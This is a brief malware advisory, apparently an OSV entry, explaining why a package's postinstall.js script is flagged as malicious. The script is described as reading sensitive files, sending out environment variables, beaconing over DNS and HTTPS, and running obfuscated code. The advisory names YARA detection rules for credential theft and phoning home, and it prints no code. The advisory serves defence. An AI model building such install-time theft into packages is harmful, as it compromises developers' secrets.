The package is marked as malware by OSV: MAL-2026-2498 with source: amazon-inspector

Note: This report is updated by a verification record

The package exhibits multiple malicious behaviors. The postinstall.js script reads sensitive files (Evidence 5), exfiltrates environment variables (Evidence 4), attempts DNS beaconing (Evidence 6) and HTTPS exfiltration (Evidence 7, 8, 9), and contains obfuscated code execution (Evidence 10). It also attempts to establish a raw IP socket connection (Evidence 11). The YARA rules eval_base64, id_rsa_not_ssh, nodejs_phone_home, and curl_https_ssh match the postinstall.js file, indicating suspicious activity. The package.json includes a postinstall script, which is a common technique for malicious packages (Evidence 12). The combination of these factors strongly suggests that the package is malicious.